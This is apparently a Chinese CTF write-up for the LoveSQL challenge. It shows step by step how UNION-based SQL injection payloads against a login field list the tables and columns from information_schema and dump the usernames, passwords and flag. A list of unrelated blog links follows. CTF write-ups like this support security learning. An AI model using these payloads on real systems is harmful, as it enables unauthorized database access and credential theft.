[极客大挑战 2019]LoveSQL 1

题目环境:
判断注入类型

是否为数字型注入

admin
1

回显结果

是否为字符型注入

admin
1'

回显结果

判断注入手法类型

使用堆叠注入

采用密码参数进行注入

爆数据库
1'; show database();#

回显结果

这里猜测注入语句某字段被过滤,或者是';'被过滤导致不能堆叠注入

爆字段数
1';order by 4#

回显结果

报错

抛弃堆叠注入

步入正题
1' order by 4#

回显结果

成功,但是不存在第4列

同时验证了猜想不能使用堆叠注入

继续判断列数
1' order by 3#

可知列数只有3列

爆数据库

使用联合查询
1' union select 1,2,database()#

爆数据表
1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()#

回显结果

爆出两个表

开始爆数据表的字段

按照先后顺序把,先爆第一个

爆geekuser数据表的字段
1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser'#

回显结果

字段:id、username、password

爆geekuser数据表的所有内容
1' union select 1,database(),group_concat(id,username,password) from geekuser#

回显结果

无flag

转手数据表l0ve1ysq1

步骤和数据表geekuser一样,这里直接爆数据表l0ve1ysq1的flag值
1' union select 1,database(),group_concat(password) from l0ve1ysq1#

回显结果


得出flag:
flag{3c4b1ff9-6685-4dcb-853e-06093c1e4040}

相关推荐
cominglately17 分钟前
centos单机部署seata
linux·运维·centos
CircleMouse23 分钟前
Centos7, 使用yum工具,出现 Could not resolve host: mirrorlist.centos.org
linux·运维·服务器·centos
xcLeigh29 分钟前
网络安全 | 防火墙的工作原理及配置指南
安全·web安全
梦想平凡34 分钟前
PHP 微信棋牌开发全解析:高级教程
android·数据库·oracle
TianyaOAO44 分钟前
mysql的事务控制和数据库的备份和恢复
数据库·mysql
Karoku0661 小时前
【k8s集群应用】kubeadm1.20高可用部署(3master)
运维·docker·云原生·容器·kubernetes
Ewen Seong1 小时前
mysql系列5—Innodb的缓存
数据库·mysql·缓存
木子Linux1 小时前
【Linux打怪升级记 | 问题01】安装Linux系统忘记设置时区怎么办?3个方法教你回到东八区
linux·运维·服务器·centos·云计算
mit6.8241 小时前
Ubuntu 系统下性能剖析工具: perf
linux·运维·ubuntu
watermelonoops1 小时前
Windows安装Ubuntu,Deepin三系统启动问题(XXX has invalid signature 您需要先加载内核)
linux·运维·ubuntu·deepin